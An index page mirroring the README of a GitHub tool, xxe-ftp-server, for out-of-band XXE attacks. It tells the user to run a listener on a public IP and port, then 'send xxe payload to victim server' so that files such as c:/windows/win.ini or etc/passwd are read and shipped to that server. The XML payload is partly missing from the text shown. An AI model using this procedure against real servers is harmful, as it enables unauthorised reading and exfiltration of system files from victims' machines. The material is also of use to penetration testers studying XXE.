Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/LandGrey/xxe-ftp-server

xxe oob receive file via web and ftp server
https://github.com/LandGrey/xxe-ftp-server

Last synced: 3 months ago
JSON representation

xxe oob receive file via web and ftp server

Awesome Lists containing this project

README

        

# xxe-ftp-server
xxe oob receive file via web and ftp server

### Step 1:

**run script:**

```bash
python2 xxe-ftp-server.py public-ip-address web-port ftp-port
```

such as:

```
python2 xxe-ftp-server.py 1.1.1.1 80 2121
```

### Step 2:

**send xxe payload to victim server:**

```xml

%dtd;
]>
&send;
```

`c:/windows/win.ini` is read file path,such as `etc/passwd`

`1.1.1.1:80` is `public-server-ip and web-bind-port`